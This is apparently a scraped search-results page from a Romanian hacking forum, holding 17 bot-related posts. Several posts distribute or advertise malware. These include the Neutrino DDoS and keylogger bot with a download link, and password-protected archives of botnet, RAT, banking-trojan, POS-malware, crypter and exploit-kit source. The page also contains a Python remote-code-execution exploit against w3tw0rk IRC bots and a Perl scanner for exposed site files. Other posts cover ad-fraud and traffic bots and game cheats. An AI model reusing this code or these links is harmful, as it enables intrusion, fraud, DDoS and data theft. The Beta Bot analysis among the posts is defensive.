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Found 21 results

  1. XVideos Bot mass upload. Bot-ul este facut in ubot. Selectati folderul in care se afla videoclipurile , iar bot-ul isi face treaba singur. Pune automat titlul si tag-uri. Este util celor care se ocupa cu crakrevenue sau chestii de genul. Pret 10$ paypal.
  2. About BotMan BotMan is a framework agnostic PHP library that is designed to simplify the task of developing innovative bots for multiple messaging platforms, including Slack, Telegram, Microsoft Bot Framework, Nexmo, HipChat, Facebook Messenger and WeChat. $botman->hears('I want cross-platform bots with PHP!', function (BotMan $bot) { $bot->reply('Look no further!'); }); Documentation You can find the BotMan documentation at http://botman.io Support the development Do you like this project? Support it by donating PayPal: Donate Patreon: Donate Contribuiting Please see CONTRIBUTING for details. Security Vulnerabilities If you discover a security vulnerability within BotMan, please send an e-mail to Marcel Pociot at m.pociot@gmail.com. All security vulnerabilities will be promptly addressed. License BotMan is free software distributed under the terms of the MIT license. Download botman-master.zip Sources: https://botman.io https://github.com/botman/botman
  3. gophirc A simple IRC bot framework written from scratch, in Go. Description Event based IRC framework. Warning The API might break anytime. Framework managed events Manages server PING requests (not CTCP PING) Registers on first NOTICE * Identifies on RPL_WELCOME (event 001) Joins the received invites & sends a greeting to the channel Logs if the bot gets kicked from a channel Features Capability to connect to multiple servers Multiple per event callbacks State & general logging Graceful exit handled either by a SIGINT (Ctrl-C) Parses a user from an IRC formatted nick!user@host to a User{} Config implements a basic checking on values Already implemented basic commands - JOIN, PART, PRIVMSG, NOTICE, KICK, INVITE, MODE, CTCP commands Many (?) more More: https://github.com/vlad-s/gophirc Bonus, IRC bot using gophirc - gophircbot: https://github.com/vlad-s/gophircbot
  4. Cu ocazia aniversarii a zece ani de FileList, au decis sa lanseze mai multe surprize, unda dintre acestea fiind: Toate bune si frumoase, doar ca, daca esti tampit ca mine si ai gasit prima data giftbox-ul la ora 5 dimineata (sau pentru oamenii normali, esti ocupat) si nu ai cum sa verifici la 24 de ore, vei pierde din premii*. Si cum suntem cu totii 0xH4X0R1 pe aici am decis sa fac un mic script in PowerShell (daca am chef/rabdare il voi face si in Python) care sa se ocupe de problema: Mod de utilizare: Copy - Paste la cod intr-o fereastra de PowerShell apoi rulati Invoke-FileListGetGift. Salvati codul intr-un fisier *.ps1 apoi din PowerShell ii faceti source: adica scrieti in consola ". .\NumeFisier.ps1" (atentie la punctul din fata - e ca la bash) apoi rulati Invoke-FileListGetGift. Daca doriti sa vedeti mesajele de debug setati $DebugPreference = "Continue" in consola din care rulati apoi apelati Invoke-FileListGetGift.
  5. Doresc un bot de watchers care sa-mi viziteze un link. Must have : -lista proxy (eu vin cu lista) sau si mai bine sa se foloseasca de proxiuri din reteaua TOR, nu stiu cate proxiuri au disponibile... -posibilitatea sa aleg nr. total de threads si nr de threads per proxy -fiecare thread sa aibe fingerprint diferit (os/browser etc)...poti sa integrezi prin api de aici direct https://developers.whatismybrowser.com/ sau vii tu cu o alta varianta -time watch...adica cat sa stea activ pe pagina si in acest timp sa existe la un interval de 40-60sec scroll pe pagina, pt a nu avea sesiune de logout de pe pagina -timeout adjustabil pt proxy si daca nu e bun, aruncat la cosul de gunoi si ce e bun sa se salveze intr-o lista -legat de UI nu stiu sigur, depinde de pret, daca nu, o sa-l rulez din comenzi cu un pic de ajutor la inceput in caz ca ma incurc. Legat de limbajul de programare, sa fie cat mai fiabil, sa ruleze in background, pt ca vreau sa-l deschid in 1000-1500 threads pe un vps de 16gb RAM, cu 8 cores, il pot mari la nevoie 32gb ram etc Din sapaturile efectuiate pe internet am observat ca python, nodeJS, phantomJS s-ar preta, poate gresesc cine stie. Legat de pret vb pe PM sau skype: shuttershades89 Astep propuneri. MS anticipat.
  6. In acest Tutorial va invata cum sa folositi AdFly Bot, AutoSKIP (Da SKIP singur) Tot ce aveti nevoie este o lista de ip-uri proxy. SUCCES! Sign Up for AdFly: https://join-adf.ly/16225665 Download bot ► http://adf.ly/1n1I5G Download proxy ► http://adf.ly/1n1I5G Download key of bot & proxy ►http://adf.ly/1n1I5G Video Tutorial:
  7. O mica colectie de boti pentru voi. Bot Bundle 1 - ( includes over 150 bots with source code and moded versions): OSMDB-BOTNET-PACK-1.zip - Speedy Share - upload your files here Bot Bundle 2 - ( 155 bots): OSMDB-BOTNET-PACK-2.zip - Speedy Share - upload your files here Bot Bundle 3 - ( 53 bots and ransomware ): OSMDB-BOTNET-PACK-3.zip - Speedy Share - upload your files here Bot Bundle 4 - ( urxbot, Spybot, sdbot, rxbot, rbot, phatbot, litmus, gtbot, forbot, evilbot, darkirc, agobot, acebot, jbot, microbot, blueeyebot, icebot, q8bot, happybot,): OSMDB-BOTNET-PACK-4.zip - Speedy Share - upload your files here
  8. Salutare Sunt interesat si eu de un bot sau o sursa pentru generare de trafic safe catre youtube. Nu ma intereseaza sa trimit direct 100k traffic intr-o zi dar 1500 imi ajunge . Poate stiti un bot ok care sa poata face asta , am incercat mai de mult cu chingling sau cum ii zice dar am inteles ca acuma cam da rateuri si ma intereseaza in special ca traficul sa nu vina din china. Poate aveti cunostinte despre asa ceva si imi puteti da cateva sfaturi. Multumesc anticipat !
  9. Check out the lastest working bot for satoshimines which has efficiency of 8.7/10
  10. ------------------------------------------------- Russian thread google translated: ------------------------------------------------- Neutrino Bot - The main functional * HTTP (S) flood (methods GET \ POST) * Smart DDoS * AntiDDOS flood (Emulation js \ cookies) * Slowloris flood * Download flood * TCP flood * UDP flood * Loader (exe, dll, vbs, bat ... + can specify parameters for running the file) * Keylogger (Multilanguage) (support for virtual keyboards (removal of screenshots in the clique size 60x60)) (possibility to monitor the specified window) * Command shell (remote command execution using shell windows) * Stealing files by mask (eg bitcoin wallets) * Launch the browser with one of these links (aka Cheaters views) * Spoofing Hosts * Stilling Win keys * Reproduction (USB \ Archive) * Purity downloads (number found "neighbors" on the computer) * Identifying the installed AV (on all Windows except Server) * Update * Work through the gasket - Additional Features * Anti debugging * AntiVM * Detect sandboxes * Detect all online services automatic analysis * BotKiller * Bot protection (protection process \ file \ registry branches) * Unlimited number of concurrent commands (Some teams have a higher priority than others, and their execution stops others) * Unlimited number of backup domain * Quiet operation even under a limited account * Do not load the CPU - Functional admin * Flexible system for creating jobs * Detailed statistics for bots * Ability to give commands to each country separately or bot * Customizable otstuk bots * Sort bots in Articles IP \ Live \ Country \ OS * System Bans. - Weight uncompressed binary file ~ 50kb (PL - C) - Boat tested on the entire line of Windows, from XP to 8.1 (x32/64) tags -Astea sunt preturile la vanzator dar le ofer gratuit Full set (+ bot + admin panel to build an unlimited number of domains) - $ 200 Rebuild (also unlim. Quantity domains) - $ 10 Update (functional) - $ 20 Builder - $ 550 Payment - WM \ BTC \ Perfect Download: https://mega.co.nz/#!vgBgHIrC!aF9L2ea5xcRU3vQ92rTzA5kOCAeqe43M0jowB9t7Nqs Daca nu aveti unde sa il puneti va pot oferi server Aici
  11. This project is intended for malware developers,researchers or other security experts. This is the final release of this project which contains: Android Source -Dendroid Size: 5.47 MB Download: [url=http://speedy.sh/brmnE/Android-Source.zip]Android Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: e06a9a222a623dea995877129f1124541f571ca3 ====================== Banking-Trojans-Source bootkit hunter or zusy bot iBanking JHTTP source PowerLoader Spy eye v1.0 tinibanker Zemra ZeuS Size: 42.36 MB Download: [url=http://speedy.sh/NScsB/Banking-Trojans-Source.zip]Banking-Trojans-Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: 56a56a9bea910a56d5398a43faae110f51f7999c ====================== Binders-Source Azazel Binder BBinder Stubgen Binder Joiner Biohazard Binder BlindSpotv1.0 (Binder) C++ Files Merger Danger Zone Binder Devil Binder 1.0 [SRC](VB6) Ejemplo Binder JABT1.2 - Justin Another Binder Tool Little Joiner NRG Binder Picture Binder Viotto Binder XP0wer CrypterBinder Size: 6.87 MB Download: [url=http://speedy.sh/fJ58N/Binders-Source.zip]Binders-Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: 8bac687326d3cdde2bc45ad3ac7b7fc693dc0355 ====================== Botnet-Source Acebot Agobot blacksun DarkIRC Evilbot Forbot gtbot Litmus sdbot Spybot urxbot v0lk Botnet (rbot)x0n3 Satan v1.0 Priv8 By CorryL{x0n3 h4ck} 120 Moded By t0nixx 120 [BruteTest] V0.5 120 [DVNC TEST] DDOS V1.0 120 [ModBot] SNIFF VNCBRUTE SP2FIX NICK 120 [ModBot] SP2FIX SYM VNCBRUTE 120 [ModBot] V0.5 120 [ModBot] V1.0 120 [ModBot] VNCBRUTE MSSQL 2007 120 [netapi sym mohaa] (vncbrute sp2patch) 120 [SP2 PATCH BRUTE] V2.0 120 [SP2 PATCH] V2.0 120 [SP2FIX VNCBrute Mohaa] STRIP V1.0 120 [SP2FIX VNCBrute Mohaa] Test V1.0 120 [SP2fix VncBrute] FINALV1.0 120 MYSQL V2 120 MYSQL V999 120 MYSQL1THREAD V2 120 MYSQLBRUTE V2 120 PSTORE MSSQL SYM NTPASS VNC NETAPI 2007 120 VnC Brute+pStore @@ SKUZ FIXED DDOS @@ dkcs ddos bot Radmin scanner EcKstasy sHk Bot.svchost ns dev.NOT FOR RELEASE a a59base acidBot acidBot2fix acidbotEncypt Ad Clicker Bot Private Free Hack VIP Tool agobot3 0.2.1 pre4 priv AkBot IRC lsd mod AkBot x0r dns Akbot v0.4.1 netapi asn pstore spam aspergillus 1.3 bBot Version 0.6 BioZombie 1.5 Beta blacksun BlowSXT blueeyebot bmw bot mods botnet200 Brainbot v1.5 C 15Pub pre4.c C 15Pub CBot Fixed Version ChodeBot C++ v1 base ciscobawt Crackbot v1.4b final spin Crx realmbot.VNC+RFI Crx realmbot VNC exploit CYBERBOTv2.2 Stable.m0dd ownz.DreamWoRK CYBERBOTv4.0 DarkAnalNKX BACKDOOR REMOVED darkbot6a3 Darkness IRC Bot Darkness.last.mod dbot irc sell Dbot.v3.1 DCI Bot dci bot dopebot0.22 dopebot0.22.uncrippled dopebot dopebot 2.0 dopebot current drx realcast woopie EPiC BoT V1 fiesta Sploit pack ForBot sniffer other mods ch405 ForBot Olin SYM VNC NETAPI All The Public Shit frozenbot6 fukj00 fungus fxBot beta g spotv2.0 Gellbot 3 GENTOOreptile base GigaBot DCASS gsys1 gsys3 final gt badteam gt virtualslut gt gtbot hackersteam gtsev spreader gtsev spreader 2 H Bot M0d 3.0 M0dd3d by TH & Sculay H Bot M0d 3.0 M0dd3d by TH Sculay h3xb0t h4x0rb0t 2.0 gt edition happybot.v2.0b harvecter bot hdbotv0.2 ciscoscan hellbot3[10 06 05] hellbot10 06 05 hellbotv3 htmlinfectbot hydra 2008.1 I1.4b0 icebot icepack ie7 mod IHS H A V003 Exploits iis gt bot illusion bot Imbot1.3 V3.1 IMBOT MOD IMBot SRC $$ IMbotMod V4.1 InTeL m0dd Test101 ms0640 irbot0.15 ircd.tar.gz IrcWormv1.3 SourceCode IrINi bot 0.1 public limited version for win32 italian jbot JRBOT Modded By bloody kaiten.c knight KoBRA RFISCaN.EDiTEDBYBRaT l0lw0rm LiquidBot FixEd By Pr1muZ anD Ic3 litmus2 bot litmus2 bot 2 Lnknell LoexBot M0LdBotv1.0 small microbot mm0d asn mmodbasn ModBot V1 Mod by iNs v0.2 MSDN(mirc scan bot) MSITBotWin MSN Spread Bot Priv8 my poly sploit ie6 ie7 op firefox mystic Urx mystic Urx Fixed by Pr1muz nbot032 update 5 28 08 enc 07 10am Nbot NESBOT v5 nesebot1.1r ASN PNP nesebot1.2 Netapi.Prueb Norman.2oo6.Prif Jessi Off New Folder New NZM netapi bot niggerbot vnc nocrypt NinjaBot NITE AIM NtScan rbot nullbot[2.1.1] [23 11 05] nullbot[finals] NzM 3.0 By Ph3mt nzm netapi nzm priv shit nzmlite sql nzmlite symantec oscar panicAttack pBot pBot v2 Phatbot gh3tt0Bot Phatbot NortonBot phatbot SkYKr3w Phatbot stoney phatbot[11 20 04][PCAP][SYNSCAN] phatbot alpha1 phb2 php bot plague.gecko.netapi pr1vsrc nzm m0d by ibby private enzyme rxmod 04 04 05 prueva[1].Netapi.asn.m0dded Norman prv nzm rx.sp2fix.rcast PsyProxy pwnBoT Q8Bot q8bot r00fuzV1.1a r00t3d.asn.ftp.lsass.by.Morgan RAGEBOT RAGEBOT[Clean] RansomWar Ravbot rbot0.2 scionix 102b working rBot0.3.3Pub rbot LC Priv8 rBot sxt harro rBot 0.2 MODE by akusot.v1.5 rbot dnsquery2007 rbot netapi vnc ipswitch rBoT oTh3R dImeNsIoN 4.4x(2) rBoT oTh3R dImeNsIoN 4.4x rBotv0.6.6 privlsass Release no cpp reptile small reptile.04.pnp.asn.ftpd.reload Reptile. small .DMG.Fixes.0x1FE reptile reverb reverse rezo.ninjabot RFI SCAN.V2.PRIVATE 1x33x7 ri0t[v5] ri0t] ri0t v4 ri0t v5 ri0tv5 RNM5 Priv Pr1muZ rnm5b Rose v1.3 2007 by DreamWoRK Rose1.1 Rose 2008 Rose v1.3 2007 by DreamWoRK rouge bots xdcc Ruffbot1.2 MassAsnPrivShit 150705 Ruffbotv2 rx 14 09 06 Netapi doyley rx AKMod msDTC1025 Stripp3d sc4nn3rz rx asn 2 re worked v3 rx asn 2 re worked v2 rx asn 2 re worked v3 RX GUTTED rx sky2kpnpprivate RX STRIP BOTKILLER 0.5 rx dev service working lsass sasser ftpd rx dev+service+working lsass+sasser+ftpd rX lsdigital Mod priv Rx Temptation RXB tM d VNC NETAPI ASN 2006 rxBot0.6.6b priv stable CoKeHeAd rxbot EcLiPsE cReW 1.1.priv rxbot EcLiPsE cReW 1.1.priv RxBot MP RXBOT RevengE2005pnp rxBot sxt harro rxbot xerion 2.0 rxbot7.5 rxbot2006 rxbot 0.65 Rxbot 7.6 Modded Tr0gdor Rxbot 7.6 Modded Tr0gdor 2 Rxbot ak 7.7 fira pviv8 rxbot undertow 6 6 05ASN rxbot undertow 6 10 05 rxbot undertow[PnP]modded.memcpy.0.2 rxbot v0.6.5 pk lsdigital spreader rxBot v0.7.7 Sass s5 Sbot RARSpreader SBX.amk.0x00 screens sd with fake xdcc by Synco sd bot all SDbot05b getadm sdbot05b skbot mods by sketch sdbot i3s sdbot ntpass codefix nils 22.10.03 Sdbot Hardcore Mod By StOner SDBot with NB spreader SDX.amk.0x00 shadowbot m3 shadowbot shadowbotv3 shellbotFTP sHk Bot.svchost ns dev.NOT FOR RELEASE SkuZ BoT V.1 2006 SkuZ Netapi VNC IM Sky Bot incomplete Skype Spread(PoC).7z Small SpazBot SpyBot Leechbot r1.5a private spybot1.2 FULl spybot1.4 spybot 1.2c spybot 1.3m spybot 1.4 STEAMBOT src 2008 Stripped RXV8 svBot svbot activex svmail SYM VNC NETAP 304 ASN TANKBOT 1.0 tgspy nt TsGh Bot v3 uber wks asn m0dded Pr1v Unix bot 2.2.5 uNk + USB URX pnp asn Urx.SYM+ASN Urxbot.pRiV sKull.MoD ASN FTP WORKING vbbot vBot VNCscanner VrX 5 Priv8 Msn Yahoo TIM EXPLS DDOS 116kb w32 netapi rfi whit vnc exploit w32ogw0rm WarSkype wbot 0.2 Win32.Anthrax Win32.Divinorum Win32.Fga Win32.FridaySectoriate Win32.Harulf Win32.Mimail Win32.MiniPig Win32.Relock Win32.Whore wisdom wisdom3 wisdom phr0st modd Wiseg3ck0 AIM DDOS woodworm2 X0R USB By Virus xerion2.5 XfireSpread xTBot.0.0.2 priv ya.bot Zemra Source Zeus zunker Zutick Administrator Bot Size: 190.74 MB (200,005,186 bytes) Download: [url=http://speedy.sh/chjZT/Botnet-Source.zip]Botnet-Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: 849f862af76c327caef0c41037c24858c072abc3 ====================== Crypters-Source Abstract Crypter Carb0n Crypter v1.7 [C++]darkcrypt0r Christmas Crypter CodingNation Crypter Crypter Crypter v1 Cryptic3source-Crypter Cryptosy Cryptosy Crypter Cyber Crypt 7 D0pe Crypter Dark Matrix Crypter DR True Crypter DW Crypter DYnAsTYCrypTeR UsG Evil Crypter v1 Fire Crypter Fly Crypter Indetectables Crypter m3m0s Crypter v2.0 Niller Crypter Njw0rm rat v3.5 NT Crypter v2 OhShin Crypter Open crypter Peacefull Crypter Poly Crypter Polymorphic crypter ProCrypter - Stubgen Rainerstoff Crypter redix crypter Relapse Private VB6 Crypter Royal crypter Runtime Crypter Schwarze Sonne crypter SkuLLByte Crypter Sotpot Simple Crypter Strong Crypt TNT Crypter Tughack crypter VB Crypter VBCrypto White-Crypt White Crypter Size: 16.43 MB Download: [url=http://speedy.sh/ZAC8X/Crypters-Source.zip]Crypters-Source.zip - Speedy Share - upload your files here[/url] Password: Thanks_for_downloading_ping_sec sha1sum: d27b9bc54ec1d64bb098b93dc0a2f1ac9d6739e1 ====================== DDoS-Tools-Source ATTBooter DDoS UDP-Tunnel Size: 6.09 MB Download: [url]http://speedy.sh/hezFt/DDoS-Tools-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: d55c1bd0bc74c83eb8a83ae1d364550b409d88f1 ====================== Exploit-Kits-Source blackhole102 BleedingLife2 Crimepack3.1.3 eleonorev1 1.4.4 firepack Fragus BlacK ice-pack-3 Phoenix2.5 RIG sakura Sava Exploits Pack Size: 40.7 MB Download: [url]http://speedy.sh/Exny4/Exploit-Kits-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: d66bad2a12c58695b0af23ae7a04a4700b5869c2 ====================== Keylogger-Source basic keylogger source Ejemplo keylogger Keylog Keylogger Keylogger Keylogger 2 Keylogger by Kyzer23 Keylogger C Keylogger C 1 Keylogger C 2 Keylogger C 3 Keylogger Cpp Keylogger FTP Sharp Keyloger v1.0 Size: 1.49 MB Download: [url]http://speedy.sh/AFrz7/Keylogger-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: e9b0d8a8aab75c67eb5a3688e74e4825937678c7 ====================== POS-Malware-Source dexter Pony 1.9 Alina POS Size: 38.59 MB Download: [url]http://speedy.sh/chj2T/POS-Malware-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: e0e73d3957486cf65c5af27781ab6d24d4052fbc ====================== RAT-Source AryanSourceRelease Blackshade FBI-RAT psyb Spy-net.2.7.beta Aero-Rat Agony Alte RAT Armageddon RAT BioNukE RAT Black Dream RAT BlueRAT Crypter Breaksoft RAT Ciccio RAT derSphear RAT Error 404 RAT Evoloution RAT F0xit 0.1 Fasito RAT FearRAT gh0st3.6 src HandleX RAT Heat RAT LocustPEA Messiah v2.0 RAT Minimo RAT Monk RAT Omega v1.1 RAT ProAgent V1.21 source Rat-b RAT Phillipp RAT Remote Administration Tool Storm v1.0 RAT Size: 113.45 MB Download: [url]http://speedy.sh/wc346/RAT-Source.zip[/url] Password: Thanks_for_downloading_ping_sec sha1sum: 9294863ce7833fa8857fedba4915a9aea9b14dc5 ==============================================
  12. andrei98M


    So, am facut si eu un bot pentru Ajax chat in c#. Am facut o saptamana de C#, asa ca fiti mai putin duri, va rog Easy Tutorial: Scrii linku,dai navigate, scrii nume, parola, dai login, start bot si aia e. Am incercat sa-l fac, cat mai user-friendly, adica orice idiot sa poata avea un bot pe chat.O sa adaug si fisier.txt cu comenzi, ca sa fie mai usor de adaugat comenzi de utilizatori, asta pe viitor , are doar cateva comenzi pentru moment : - ipOf(url); -vreme(oras); -about; -cuvintele obscente sunt atentionate de bot; Sper sa nu se supere moderatorii ca am folosit denumirea "RST chat bot", imi cer scuze de pe acum. Arata cam asa: Sursa aici: AjaxChatBot.zip :: Free File Hosting - File Dropper: File Host for Mp3, Videos, Music, Documents. Executabil aici: AjaxChatBot.zip :: Free File Hosting - File Dropper: File Host for Mp3, Videos, Music, Documents.
  13. GirlShare - Download AimBot.rar /Cheat's for cs 1.6 /Work EAC /Work steam /Vac protect /Update all other /Trigger Bot /RCS /Anti screen protect by shield
  14. /Cheat's for CS:GO /Work EAC /Work steam /Vac protect /Update all other /Trigger Bot /RCS /Anti screen protect by shield ###DOWNLOAD -> GirlShare - Download AIMBOT-ESP CS GO.rar ###DOWNLOAD -> Zippyshare.com - AIMBOT-ESP CS GO.rar ###DOWNLOAD -> https://www.sendspace.com/file/xjs9so
  15. # thehunter.py # Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution # author: @shipcod3 # description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution. import socket import sys def usage(): print("USAGE: python thehunter.py nick \n") def main(argv): if len(argv) < 2: return usage() #irc server connection settings botnick = sys.argv[1] #admin payload for taking over the w3wt0rk bot server = "us.dal.net" #irc server channel = "#buhaypirata" #channel where the bot is located irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket print "connecting to:"+server irc.connect((server, 6667)) #connects to the server irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :I eat w3tw0rk bots!\n") #user authentication irc.send("NICK "+ botnick +"\n") #sets nick irc.send("JOIN "+ channel +"\n") #join the chan irc.send("PRIVMSG "+channel+" :!bot @System 'uname -a' \n") #send the payload to the bot while 1: #puts it in a loop text=irc.recv(2040) #receive the text print text #print text to console if text.find('PING') != -1: #check if 'PING' is found irc.send('PONG ' + text.split() [1] + '\r\n') #returnes 'PONG' back to the server (prevents pinging out!) if text.find('!quit') != -1: #quit the Bot irc.send ("QUIT\r\n") sys.exit() if text.find('Linux') != -1: irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n") irc.send ("QUIT\r\n") sys.exit() if __name__ == "__main__": main(sys.argv) Source: http://packetstorm.wowhacker.com/1504-exploits/thehunter.txt
  16. In this article, I would like to show how an analysis is performed on the Beta Bot trojan to identify its characteristics. The Beta Bot trojan, classified as Troj/Neurevt-A, is a dangerous trojan. This trojan is transferred to the victim machine through a phishing email, and the user downloads the files disguised as a legitimate program. This malicious file, when executed, drops a file in the victim machine, then changes system and browser behaviors and also generates HTTP POST traffic to some malicious domains. Beta Bot has various capabilities, including disabling AV, preventing access to security websites, and changing the settings of the browser. This trojan was initially released as an HTTP bot, and was later enhanced with a wide variety of capabilities, including backdoor functionality. The bot injects itself into almost all user processes to take over the whole system. It also utilizes a mechanism to make use of Windows messages and the registry to coordinate the injected codes. The bot also communicates with its C&C server through HTTP requests. The Beta Bot trojan spreads through USB drives, the messaging platform Skype and phishing emails. Analysis Walkthrough Now let’s see how we can do a detailed analysis on the Beta Bot trojan. First step is to isolate the infected system and analyze the system to find any suspicious files. Upon analysis, we found a suspicious file, crt.exe. The crt.exe file was then uploaded into our automated malware analysis system for deeper analysis and it was able to find malicious traffic to several malicious domains. (DNS request to malicious domains) A list of file manipulations was revealed during automated malware analysis. A malicious file named ‘wfwhhydlr.exe’ that was dropped by Beta Bot was revealed during this analysis. (File creation and modification) Mutexes that were used by the malware were also found during the automated analysis. (Mutex list of Beta Bot Trojan) After that, the analysis was carried out on our dedicated malware analysis machine. This machine consists of all the core tools needed to carry out both the static and dynamic analysis. As the first step of manual analysis, static analysis was carried out to find the time stamp of the malware. We were able to find the compile date of the malware sample. The malware was compiled on March 14th, 2013, and a GUI is also associated with this sample. File properties of the Beta Bot trojan) Later, static malware analysis was carried out, and as a first step the malware was checked to find whether it was packed or not. On analysis we found that the malware was packed with UPX packer. (Packer detection of the malware) A manual unpacking process was carried out to unpack the packer using a user mode debugger. Then we dumped the unpacked malware, and Import Address Table was reconstructed. (Debugger view of the malware before UPX unpacking) After the IAT reconstruction, the malware was analyzed using the debugger and found that there is no data available and the all the strings are functions are obfuscated. Thus it has to be suspected that the malware was multipacked, and we found that it was packed with a sophisticated crypter called VBCrypter. Then we came to a conclusion that this Beta Bot malware was multi-packed with a combination of UPX packer and VBCrypt crypter. VBCrypter is written in Visual Basic and it is more sophisticated that usual packers. During the execution of the packed malware, it creates the unpacked code as a child process itself and executes that code in the memory. Thus this type of packed malware will be very difficult to unpack. Crypter detection of the malware) Then a process of steps was carried out in order to decrypt the malware encrypted with VBCrypt. A user mode debugger was used for this process and by following a series of steps; the malware was decrypted up to an extent and thus the obfuscated code was retrieved for further analysis. Debugger view of the Beta Bot trojan after UPX unpacking) After decrypting the VBCrypt, it showed up with strings and functions that reveal the activity of the malware. The Beta Bot malware tries to find out the Network Interface Card in the infection machine, in order to find out the network adapter device name. The malware also looks for the computer name of the infected machine. (Debugger view of the decrypted Beta Bot trojan) Also using the debugger analysis, it came to an inference that the Beta Bot trojan also has the capability of deactivating the Task Manager of the infected machine. (Debugger view of the malware) The malware was analyzed through a disassembler, and several multi-language strings were retrieved. This reveals the multi-language capability of the Beta Bot trojan. This malware has the ability to configure and behave according to the geo-location of the victim machine. (Disassembler view of the Beta Bot trojan) Dynamic analysis was carried out by executing the malware within our isolated virtual malware lab. On executing the Beta Bot malware was dropped another executable named vuxrwtqas.exe. This file was dropped in the highworker folder under the Program files folder in C drive. (Files dropped by the Beta Bot trojan) Then registry analysis of the Beta Bot trojan was carried out, and on analysis we found that the malware manipulates the Windows registry setting of the infected machine. Registry values are added in order to carry out the debugging of the major security products like MalwareBytes Spybot, Trendmicro Housecall and Hijackthis. This registry setting can used to debug the startup code of the applications and thus the malware can bypass these security applications and thus can execute in the machine. (Registry values added by the Beta Bot trojan) Then packet sniffers were used to study the network behavior of the malware, and we were able to list out several malicious IPs on which the malware were trying to connect. Malicious IPs on which the malware connects) Then the memory analysis of the malware was carried out by executing the malware and taking the dump on the primary memory. On analysis, a large number of trampoline hooks was found. The malware, when executed, hooks almost all the processes in the victim machine and thus takes control of the whole machine. The Beta Bot trojan inserts a trampoline hook on the wuauclt.exe file, and this is a Windows Update AutoUpdate Client which runs as a background process that checks the Microsoft website for updates to the operating system. Thus it can assumed that the malware updates itself or downloads other malicious software by hooking this process. (Trampoline hook by the malware) The Beta Bot trojan, on execution, creates a sub-folder named ‘highworker.{2227A280-3AEA-1069-A2DE- 08002B30309D}’ under %PROGRAM FILES%\ COMMON FILES and creates a file named ‘vuxrwtqas.exe’. The first part of the folder name, ‘highworker’, is obtained from the configuration of the bot. The rest of the strings in the folder name is a special GUID which makes the folder link to the ‘Printers and Faxes’ folder in Windows Explorer, and this folder will act as the initializer when malware restarts. The crt.exe then creates a new file and it exits and this newly created file creates a process of a system application and starts to inject the process. (Folder in which malware is dropped) The dropped file is digitally signed with Texas Instruments Inc., is an American company that designs and makes semiconductors, which it sells to electronics designers and manufacturers globally. Thus we can assume that the file is not genuinely signed. (Metadata of the dropped file) Recommendations Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world. Block peer to peer traffic across the organization. Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application. Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack. Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files. Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media. Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Ensure that your Anti-Virus solution is up to date with latest virus definitions. Ensure that your systems are up to date with the latest available patches. Isolate the compromised system immediately if the malware is found to be present. Block traffic to the following domains in your perimeter devices such as Firewalls and IDS/IPS solutions: highroller.pixnet.to sbn.pxnet.to cpstw.santros.ws ccc.santros.ws Eradication The following products can be used to remove the Beta Bot trojan from the infected machine: Symantec Power Eraser Kaspersky’s TDSSKILLER Microsoft’s Malicious Software Removal Tool (MSRT) Malwarebytes Anti-Malware Login through the victim machine in Safe Mode and manually remove the process crt.exe and vuxrwtqas.exe related to the Beta Bot trojan. Manually delete the registry entries associated with the Beta Bot trojan. Delete the malicious file dropped by the malware in the highworker.{2227A280-3AEA-1069-A2DE- 08002B30309D}’ under %PROGRAM FILES%\ COMMON FILES\vuxrwtqas.exe. References Endpoint, Cloud, Mobile & Virtual Security Solutions | Symantec Source
  17. Nu stiu exact ce face , am gasito cred ca este pentru WP - SHell #!/usr/bin/perl # scanner # (c) Humax use LWP::UserAgent; use WWW::Mechanize; use threads; $ua = LWP::UserAgent->new(keep_alive => 1); $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5"); $ua->timeout(30); $defext = "php"; $| = 1; $threads = 5; head(); print "[+] Enter ip - site[(s) file] : "; $choice=<STDIN>; chomp($choice); if ($choice =~ /^(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})/) { print " + you're entering an ip address : ".$choice."\n"; dojob($choice); } elsif($choice =~ /\.txt/) { print " + you are entering a file : ".$choice."\n"; open(sites, "<".$choice) or $!; @paths)." - not found : http://".$_[0].$_[1]."/".$filescan.".".$fext; } } } print "\n"; } sub checkcommon { print " + scanning common files \n"; @cpaths = ("validator.php","uploader.php","vbseo.php","test.txt","test.zip","public_html.zip","pulic_html.rar","public_html.tar.gz","backup.zip","backup.tar.gz",".bash_history","error_log","domlogs"); $countcp=0; foreach $filecscan (@cpaths) { chomp($filecscan); $countcp++; $scanpc = $ua->get("http://".$_[0]."/".$filecscan); if ($scanpc->status_line !~ /404/){ if ($scanpc->status_line =~ /Bad hostname\)/) { print "\t - cant connect to site\n";}else{ print "\r\t ".$countcp."/".scalar(@cpaths)." + found : http://".$_[0]."/".$filecscan." ".$scanpc->status_line."\n"; } } else{ print "\r\t ".$countcp."/".scalar(@cpaths)." - not found : http://".$_[0]."/".$filecscan; } } print "\n"; } sub getjooken { $gjotoken = WWW::Mechanize->new(); 